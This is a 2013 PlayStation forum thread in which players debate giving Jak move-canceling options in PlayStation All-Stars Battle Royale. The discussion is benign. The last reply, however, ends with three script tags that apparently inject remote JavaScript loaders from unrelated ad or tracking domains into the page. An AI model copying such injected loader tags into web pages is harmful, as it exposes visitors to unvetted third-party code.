Jan 13 2013
By: Negimafan Gaming Beast 1823 posts

Jak and canceling

2 replies 206 views Edited Jan 13, 2013

So I looked at Jak's move-set in the Prima guide and noticed that aside from the Dashing Forward Punch ( + PlayStationSquare.png) chaining into the Uppercut on hit, not a single one of his moves can be canceled.

I find this kind of odd for a guy who was supposedly made to be fast. If you look into the ground version of his Super Dive Attack ( + PlayStationSquare.png), it's for some reason a full commitment even though it locks him in a small area for a little over a second. This applies to everything he does in fact: most of moves are a forced commitment on use.

But what if Jak could cancel the Super Dive at the top of the jump before dropping? Then it would become excellent as a short hop, in which he could gain a small amount of height before moving into a Jet Board Dash, or use this to add height to his Uppercut  + PlayStationSquare.png in exchange for immediacy.

What if you could cancel the Uppercut into a Jet Board Dash and then cancel that Jet Board Dash into a Super Dive so that you fall where you'd like to, all in the space less than a second? What if Jak could cancel a Daxter Spin Kick (PlayStationSquare.png) into an Uppercut or Super Dive to end it faster, or cancel a Dashing Punch into an Uppercut before hitting anyone, as an escape of an oncoming Super.

And that's just the square attacks. What if you could leave behind a Gyro Buster (PlayStationCircle.png) during any of these or begin charging your Wave Concussor ( + PlayStationCircle.png). Maybe click off some shots from the Blaster or Beam Reflexor ( + PlayStationTriangle.png and  + PlayStationTriangle.png) or start up the Mass Inverter ( + PlayStationCircle.png) to medicate the range issue the thing has.

People complain so often about Jak's lousy start-up and cool-down. I think by making him a cancel-heavy fighter like Dante, they could help him fall into a certain speedy-shooter niche. It might not be the silver bullet needed to pull Jak up from low-mid tier, but it could help.

I like to make PSASBR move-sets. Here's a few:

Dart.jpg Daedalus.png Selvaria.jpg Alicia.png Dante.png Ellen.jpg

Never say I don't contribute: I'm The Idea Man.

Community Move-Set for Specter. Help build it.

Message 1 of 3 (206 Views)
0 Likes
Wastelander
616 posts

Re: Jak and canceling

Jan 13, 2013
Jak wasn't made to be fast, He was made to have mobility.

He's also fast anyways.
Message 2 of 3 (187 Views)
0 Likes
Highlighted
Gaming Beast
2167 posts

Re: Jak and canceling

Jan 13, 2013
I like the idea of canceling his down square and up square, but really none of the other moves should really cancel. That might break him.

Jak as a character who's design makes him hover in that fine line where he's right in between broken and garbage. He's one of the few characters who really never needs to be on the ground in a game where most kill confirms and combos require you to be near the ground.

Giving him things like a cancel on his spin would make him one of the safest tech chasers in the game. Canceling into side triangle would also make him a much campier character, since he could now just safely use side square, then if he hits send you way back with side triangle, and if he doesn't cancel into up square canceled into hoverboard backwards.

Actually, even canceling up square into hoverboard might make him a ridiculously safe character...

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 3 of 3 (121 Views)
0 Likes